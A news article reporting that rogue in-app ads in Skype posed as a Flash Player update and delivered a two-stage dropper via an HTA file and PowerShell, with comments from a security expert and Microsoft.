Skype users exposed to malware through in-app ads

A fake Flash Player update ad on Skype | via reddit

A number of users are complaining that the popular communication application Skype has been hosting rogue advertisements, which has a large risk of triggering malware.

The issue was elevated to reddit last Wednesday, where the original poster complained that a malicious ad appeared while he was on Skype"s home screen, and it was pretending to be a Flash update for the computer"s browser.

As the redditor points out, the ad would prompt the user to download an HTML application named "FlashPlayer.hta," designed to look like a legitimate program. However, once opened, it would download a malicious payload, which could potentially harm a computer in the long run.

The poster has successfully deconstructed the code, and has posted it publicly on reddit.

In an investigation by ZDNet, the experts they contacted found the following regarding rogue Skype ads:

The "fake Flash" ad, designed to target Windows machines, pushed a download, which when opened would trigger obfuscated JavaScript. The code starts a new command line, then deletes the application that the user just opened, and runs a PowerShell command, which then downloads a JavaScript Encoded Script (JSE) from a domain that no longer exists, likely one of many disposable domains used to hide an attacker"s operations.

According to Ali-Reza Anghaie, co-founder of cybersecurity firm Phobos Group, the issue is what is called a "two-stage dropper". "It"s effectively the utility component of the malware that then decides what else to do based on the command and control it connects to", he shared.

While the domain used by the attacker no longer exists, Anghaie believes that it very likely serves ransomware.

Other people have complained about malicious ads inside Skype, with the fake Flash update as a common denominator.

Wow not bad, got this in @Skype today, even had the download popup! pic.twitter.com/wyQXavBINm

— caseyfoster (@caseylynnfoster) March 30, 2017

Responding to the issue, a Microsoft spokesperson said that the issue was a "social-engineering effort," and that they should not be held responsible for the malicious content. The company further explains:

We"re aware of a social engineering technique that could be used to direct some customers to a malicious website. We continue to encourage customers to exercise caution when opening unsolicited attachments and links from both known and unknown sources and install and regularly update antivirus software.

As stated, it pays to be careful in opening suspicious content off the internet. Many are out there to deceive users, and steal sensitive information, aside from malware"s usual work of wreaking havoc in our computers.

Source: reddit, ZDNet

Report a problem with article
Next Article

Market share report of desktop browsers remains more or less unchanged this month

Previous Article

Windows XP's market share takes another hit, as Windows 7 and 10 rise